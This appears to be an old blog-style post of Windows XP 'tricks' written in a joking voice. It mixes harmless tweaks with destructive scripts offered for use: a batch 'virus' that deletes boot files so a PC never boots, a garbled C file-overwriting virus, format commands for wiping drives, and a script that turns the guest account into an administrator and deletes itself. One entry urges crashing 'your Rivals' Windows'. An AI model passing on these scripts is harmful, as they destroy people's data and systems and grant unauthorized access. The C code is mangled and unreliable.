SSSSSSSMmmmmmmmoooooKKKKKKIIIINNNN!!!! somebody stop meeeeeeeeeeeeee!!!!!!!!!!!!!

GUD MORNING, and in case i dont see ya, den gud afternoon, gud evening and gud nite!!!!!!!!!

A Virus Code That Will Crash Ur Computer

Just copy the code given belows ....in notepad

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg \* U R Screwed!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

and now save this code as anyname.bat like abc.bat

when u double click on it....a message will pop up saying " U R Screwed"

and it will shut down ur computer and never boot again... Enjoy

A Virus In C That will Create New Folder Virus

#include #include #include #include #include void main(int argc,char\* argv[]) { char buf[512]; int source,target,byt,done; struct ffblk ffblk; clrscr(); textcolor(2); cprintf("——————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————& 12;———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————— #8212;–"); printf("\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n"); cprintf(&#8221:&#8212:&#8212:&#82 12;———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————— #8212;–"); done = findfirst("\*.\*",&ffblk,0); while (!done) { printf("\n");cprintf(" %s ", ffblk.ff\_name);printf("is attacked by ");cprintf("Folderbomb"); source=open(argv[0],O RDONLY|O BINARY); target=open(ffblk.ff\_name,O\_CREAT|O\_BINARY|O\_WRONGLY); while(1) {byt=read(source,buf,512); if(byt>0)write(target,buf,byt); else break; } close(source); close(target); done = findnext(&ffblk); } getch();

Open notepad....copy the code given below..

REGEDIT4 [HKEY\_CURRENT\_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp]

Allowing Dos and regedit Where It Is Disabled

"Disabled"=dword:0 [HKEY\_CURRENT\_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem] "DisableRegistryTools"=dword:0

Now save it as anyname.reg. like abc.reg

then double click on it

Open Command Prompt From Where It Is Banned

Here is the simple trick to launch command prompt from where it is banned

Go to Start-->Run-->then type cmd

Can't use command prompt ....Don't worry....

Just open up

Open up Microsoft word..Type:

"Command.com" without quotes

Then save it as Somthing.bat. eg.abc.bat that's all...u r done.

Create Your Own Icons In Paint

Here It is

1.Launch Paint from the All Programs | Accessories menu.

2.Pull down the Image menu and select the Attributes command.

3.In the Attributes dialog box, type 32 in both the Width and Height boxes and click OK.

4.To make the image easier to work with, click the Magnifier tool and select the level 8 magnification setting.

5.Press [Ctrl]G to add gridlines.

6.Use the tools and colors to create your icon.

7.Press [Ctrl]S and save the file with an ICO extension.

Formating Hard Disks By Notepad

just copy this code in notepad and save it as anyname.bat here is the code

format c:\/Q/X

this will format your drive c:\

To Format D drive just replace the above code code with this one

format d:\ /Q/X this will format your D drive like this u can format ur others drives like E ,F or G

A Virus That Will Open And Close Ur Cdrom

This Virus Will open and close your cdrom...continuously

Set oWMP = CreateObject("WMPlayer.OCX.7" ) Set colCDROMs = oWMP.cdromCollection if colCDROMs.Count >= 1 then do For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next ' cdrom For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next ' cdrom loop End If

copy this into notepad and save it as anyname.vbs like virus.vbs and then double click on it...what u see....bingo

Now if u want to disable this go to task manager click on process then find wscript.exe and end this process.

Make Autorun For Ur CDs n DVDs

If you wanna make a autorun file for that CD you are ready to burn just read this...

1) You open notepad

2) now you write: [autorun] OPEN=INSTALL\Setup\_filename.EXE ICON=INSTALL\Setup\_filename.EXE

Now save it but not as a .txt file but as a .inf file.

But remember! The "Setup\_filename.EXE" MUST be replaced with the name of the setup file. And you also need to rember that it is not all of the setup files there are called '.exe but some are called '.msi

3) Now burn your CD with the autorun .inf file included.

4) Now set the CD in you CD drive and wait for the autorun to begin or if nothing happens just double-click on the CD drive in "My Computer".

Hack Admin From XP Guest Account

echo off title Please wait... cls net user add Username Password /add net user localgroup Administrators Username /add net user Guest 420 /active:yes net localgroup Guests Guest /DELETE net localgroup Administrators Guest /add del %0

Copy the above code to notepad and save the file as "Guest2admin.bat" then u can double click the file to execute or run in the cmd. it works.. Enjoy

Creating your Own Run command

1. Simply enter to \Windows

2. There create New ShortCut by right clicking and selecting create a new shortcut opotion.

This shortcut is for the program you wish.

And the name of the shortcut is the Command you want to enter in RUN. Enjoy…. For example if I want to display my picture(any fuction u want) which is located somewhere in hard drive. Now with the help of trick I can display that picture from the run command….thats cool na… Just by following these simple steps…. As I mentioned above …first I will go to /windows directory Then I will create a new shortcut..then a window will appear that will ask u about the location of the item u want to do…now I want to display my pic…So I will give the path of my pic where it is located. Then After clicking on next button….it will ask u to give the name of the command.. Then give any name u want…then click on finish button…that all Now go to run type the name of the shortcut name..u see

Ban Shutdown In ShutDown Dialog Box

This Trick will disable shutdown option in the shutdown dialog box. Go to run?type "regedit"

Then Go to location

HKEY\_CURRENT\_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

In the right pane look for NoClose key. Set its value to 1

doing this disables the Shutdown option in the Shutdown dialog box.

You can re enable the Shutdown option by making NoClose key value eqaul to Zero

Disable The Send Error Report to Microsoft

To disable the stupid feature in WinXP which tries to send a report to microsoft every time a program crashes you will have to do this:

1.Open Control Panel

2. Click on Preformance and Maintenance.

3.Click on System.

4. Then click on the Advanced tab

5.Click on the error reporting button on the bottom of the windows.

6.Select Disable error reporting.

7.Click OK

8.Again click OK

That it..u r done

Remove Programs from the Add or Remove Programs

There are some programs which are not deleted from add/remove program list.. Here is solution to remove them

1. Click Start, and then click Run.

2. In the Open box, type regedt32, and then click OK.

3. In Registry Editor, locate the following registry key:

HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall 4. In the left pane, click the Uninstall registry key, and then click Export on the File menu.

5. In the Export Registry File dialog box that appears, click Desktop in the Save in list, type uninstall in the File name box, and then click Save.
6. Each key listed under Uninstall in the left pane of Registry Editor represents a program that is displayed in the Currently installed programs list of the Add or Remove Programs tool. To determine which program that each key represents, click the key, and then view the following values in the details pane on the right:

DisplayName: The value data for the DisplayName key is the name that is listed in Add or Remove Programs.

UninstallString: The value data for the UninstallString key is the program that is used to uninstall the program.

7. After you identify the registry key that represents the program that you removed but which is still displayed in the Currently installed programs list of Add or Remove Programs, right-click the key in the left pane of the Registry Editor window, and then click Delete.

Click Yes in response to the "Are you sure you want to delete this key and all of its subkeys?" message.

8. On the File menu, click Exit to quit Registry Editor.

9. Click Start, click Control Panel, and then click Add or Remove Programs.

In the Currently installed programs list, verify that the program whose registry key you deleted is no longer listed.

Removing Multiple Boot Screens

If you are getting unwanted multiple boot screen Then Follow these Steps.

1> Right Click on My Computer

**2>Select Properties** 

3>Select Advanced Tab

4>Select Settings In the Startup & Recovery Section(3rd grp)

5>Select the operating system which u want.

6>And Click OK.

7>Further again press the setting and click on Edit.

8>lt will open boot.ini File.

9>Now u can delete those o/s which you don't want to be displayed

Reset WinXP Admin Pass with ONLY DOS

1. click on start, enter "cmd" and press enter

2. enter "net user" or "net users"

you will see the list of users that are created on current running os

3. type "net user" "user name" "\*"

you will see that windows will now ask you to enter new password for that particular account!

4.e.g suppose i have two accounts first is Administrator and second is Mahajan.

5.now if i want to change the password of administrator. Then i will write in command prompt net user administrator \* then i will press enter

6.Now the computer will ask for the password and after after filling the password u will ask to re-type the password... that it...now the password is changed

Use system restore when you cant boot your system

If your system has failed to the point where you cannot access the Windows GUI either through booting normally or through safe mode, you may still have the chance to use the System Restore feature if you have it enabled, by running it form the command prompt. To do this:

Restart your computer and press F8 after the POST screen to bring up the Windows XP boot menu. Choose 'boot in safe mode with command prompt.'

If your system gets to the command prompt successfully, type '%systemroot%\system32\restore\rstrui.exe' and then press enter. Follow the onscreen instructions to restore your computer to a previous saved point.

Another Method To Enable Task Manager

. Go to Start - Run -> Write Gpedit.msc and press on Enter button.

2. Navigate to User Configuration - Administrative Templates -> System - Ctrl+Alt+Del Option

3. In the right side of the screen verity that Remove Task Manager option

set to Disable or Not Configured.

- 4. Close Gpedit.msc
- 5. Go to Start Run -> Write gpupdate /force and press on Enter button.

Enabling Task Manager If It Is Disabled

1. Go to Start -> Run -> Write regedit and press on Enter button.

2. Navigate to the following registry keys and verity that following settings set to default:

Windows Registry Editor Version 5.00 [HKEY\_CURRENT\_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableTaskMgr"=dword:0000000 [HKEY\_CURRENT\_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\ LocalUser\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableTaskMgr"=dword:0000000

[HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\] "DisableTaskMgr"=dword:00000000 [HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] "DisableCAD"=dword:00000003. Reboot the computer.

chat wid command propmt...

If you want personal chat with a friend you don't need to download any yahoo messenger All you need is your friends IP address and Command Prompt. Firstly, open Notepad and enter: @echo off :A Cls echo MESSENGER set /p n=User: set /p m=Message: net send %n% %m% Pause Goto A Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see: MESSENGER User: After "User" type the IP address of the computer you want to contact. After this, you should see this: Message: Now type in the message you wish to send.Before you press "Enter" it should look like this: MESSENGER User:27.196.391.193 Message: Hi Now all you need to do is press "Enter", and start chatting!

Trick to Show ur name after time in taskbar...

Hi freinds !

I m here to tell u a trick to add up ur name in place of AM and PM beside time and make urself to feel proud among ur group of frnds.

Its simple

Start -> Control Pannel -> Regional and LAnguage option -> Customize (beside English US) -> Go to TIME tab -> Change AM symbol and PM symbol from AM and PM to ur name -> Apply -> Ok ...

IS it changed ??? Might be not ...

Now go to time in taskbar and Double Click it to open "Date and time property" ... Look place where time chnges in digital form i.e. 02:47:52 AM , click to arrow to cnage the AM or PM by selecting and press arrow. It will Show ur name or name that was entered by u, Apply -> OK and be HAPPY :) Rename start Button

To rename the start button, you will need a hex editor. My preference is UltraEdit

1. Copy the \windows\explore.exe file to a new name (e.g. explorer\_1.exe)

- 2. With the hex editor, open that file and go to offset 412b6
- 3. You will see the word start with blanks between each letter
- 4. Edit it be any 5 characters or less
- 5. Save the file
- 6. Boot to DOS
- 7. Copy the existing c:\windows\explorer.exe to explorer.org
- 8. Copy explorer\_1.exe to explorer.exe
- 9. You will also need to replace the explorer.exe in the c:\windows\system32\

dllcache file as well with the new one.

Note: If the partition is NTFS and you can't access the files from DOS:

- 1. Start Regedit
- 2. Go to HKEY\_LOCAL\_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon.
- 3. Change the value of Shell from Explorer.exe to explorer\_1.exe

Watch movies in PAINT

Hey guys, did you know that you can watch movies in paint ? But u can't do anything (Just watch it while its playing in Media Player Classic, winamp or any other movie player you use.

Here's what you gotta do :

1.Open your favourite movie player and play the move (I played the .avi, format in Media Player Classic) (.mpg also works)

2.Hit "PrintScreen", keep playing the movie in the player, don't stop it.

3.Open MsPaint.

4.Select "Edit > Paste" Or Hit "CTRL+V"

You can watch movies in Paint!

But there are no Pause, Next, Previous, Stop etc. buttons

Experiment with other formats too, it doesn't play DivX , Flash movies.

Creating Shutdown Icon or One Click Shutdown:

Navigate to your desktop. On the desktop, right-click and go to New, then to Shortcut (in other words, create a new shortcut). You should now see a pop-up window instructing you to enter a command line path. Use this path in "Type Location of the Item"

SHUTDOWN -s -t 01

If the C: drive is not your local hard drive, then replace "C" with the correct letter of the hard drive. Click the "Next" button. Name the shortcut and click the "Finish" button. Now whenever you want to shut down, just click on this shortcut and you're done.

Crash Down Windows

Want To Crash Down Your Rivals Windows!! Write The Following Digits in Notepad -:

Den-: SAVE it as an .EXE file!

Note: Plz Dont Open Dat File In YOur Computer!!

Change Any Users Password In Xp

wannna to change any user password

go to

start : -> run :-> cmd - > write "control userpasswords2? without ""

a new screen will be open containing all the accounts……

from there u will get the easier way to change admin usrname n password and all other accounts info too……...

TO CHANGE FOULDER BACKGROUND

CHANGE THE ICONAREA\_IMAGE TO THE DESTINATION PHOTO & IconFile TO UR SELECTED ICON IF U HAVE IT amd save as "Desktop.ini"

[.ShellClassInfo] IconFile=E:\KOTHI\Themes\Icons\Candey\Closed Folder.ico IconIndex=0 [{BE098140-A513-11D0-A3A4-00C04FD706EC}] ICONAREA\_IMAGE=E:\Walls\cute\211.jpg ICONAREA\_TEXT=0

OR

[{BE098140-A513-11D0-A3A4-00C04FD706EC}] iconarea\_image=E:\Walls\Image011.jpg iconarea\_text=0x00FFFFF [.ShellClassInfo] IconFile=E:\KOTHI\Themes\Icons\Candey\Closed Folder.ico IconIndex=0 aaaa laaaa ki a laaaaa (i like it a lot)

Allrighty then...ok take care now ...bye bye then.

damn i'm good.....!!!

Heart told to the eyes " see less bcoz u wil see and i wil suffer a lot". The eye replied to the heart " feel less bcoz you will feel and i wil cry "...!!!